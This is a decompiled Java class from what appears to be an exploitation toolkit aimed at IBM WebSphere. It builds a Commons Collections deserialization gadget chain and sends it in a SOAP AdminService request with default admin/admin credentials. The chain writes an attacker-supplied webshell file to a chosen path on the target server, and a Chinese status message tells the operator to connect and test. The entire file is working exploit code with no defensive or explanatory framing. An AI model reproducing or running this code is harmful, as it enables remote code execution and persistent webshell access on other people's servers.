package serialize.exploittask.websphere;

import com.linar.jintegra.IJintegraJvm2;
import java.io.ByteArrayOutputStream;
import java.io.FileOutputStream;
import java.io.ObjectOutputStream;
import java.lang.annotation.Retention;
import java.lang.reflect.Constructor;
import java.util.HashMap;
import java.util.Map;
import javafx.concurrent.Task;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import serialize.Utils.HttpHelper;
import serialize.Utils.UrlTools;
import weblogic.iiop.Utils;

/* loaded from: input_file:serialize/exploittask/websphere/WebSphereShellUploadTask.class */
public class WebSphereShellUploadTask extends Task<Void> {
    private final String targetUrl;
    private final byte[] webshellPayload;
    private final String fileUpPath;
    final String requestString = "<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"6.1.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<username>admin</username>\n<password>admin</password>\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$$$$$$$$$$$$$$</objectname>\n<operationname xsi:type=\"xsd:string\">getProductVersion</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0AARCQVNF</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABBqYXZhLmxhbmcuU3RyaW5n</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>";

    public WebSphereShellUploadTask(String str, String str2, byte[] bArr) {
        this.targetUrl = str;
        this.fileUpPath = str2;
        this.webshellPayload = bArr;
    }

    /* JADX INFO: Access modifiers changed from: protected */
    /* JADX WARN: Can't rename method to resolve collision */
    @Override // javafx.concurrent.Task
    public Void call() throws Exception {
        HttpHelper.getInstance().getWebSphereResponse(String.valueOf(UrlTools.getInstance().getTargetUrl(this.targetUrl)) + "/", WebSphereUtils.getBase64Payload("<?xml version='1.0' encoding='UTF-8'?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\n<SOAP-ENV:Header ns0:JMXConnectorContext=\"\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"6.1.0.0\" ns0:JMXMessageVersion=\"1.0.0\" ns0:SecurityEnabled=\"true\" ns0:JMXVersion=\"1.2.0\">\n<username>admin</username>\n<password>admin</password>\n<LoginMethod>BasicAuth</LoginMethod>\n</SOAP-ENV:Header>\n<SOAP-ENV:Body>\n<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<objectname xsi:type=\"ns1:javax.management.ObjectName\">$$$$$$$$$$$$$$</objectname>\n<operationname xsi:type=\"xsd:string\">getProductVersion</operationname>\n<params xsi:type=\"ns1:[Ljava.lang.Object;\">rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAF0AARCQVNF</params>\n<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ABBqYXZhLmxhbmcuU3RyaW5n</signature>\n</ns1:invoke>\n</SOAP-ENV:Body>\n</SOAP-ENV:Envelope>", getUpFilePayload()));
        updateMessage("上传完毕，请连接测试……");
        return null;
    }

    private byte[] getUpFilePayload() throws Exception {
        ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[]{new ConstantTransformer(FileOutputStream.class), new InvokerTransformer("getConstructor", new Class[]{Class[].class}, new Object[]{new Class[]{String.class}}), new InvokerTransformer(IJintegraJvm2.DISPID_1_NAME, new Class[]{Object[].class}, new Object[]{new Object[]{this.fileUpPath}}), new InvokerTransformer(Utils.WRITE_METHOD, new Class[]{byte[].class}, new Object[]{this.webshellPayload})});
        HashMap hashMap = new HashMap();
        hashMap.put("value", "value");
        Map decorate = TransformedMap.decorate(hashMap, null, chainedTransformer);
        Constructor<?> declaredConstructor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructor(Class.class, Map.class);
        declaredConstructor.setAccessible(true);
        Object newInstance = declaredConstructor.newInstance(Retention.class, decorate);
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(10);
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(byteArrayOutputStream);
        objectOutputStream.writeObject(newInstance);
        objectOutputStream.flush();
        objectOutputStream.close();
        return byteArrayOutputStream.toByteArray();
    }
}
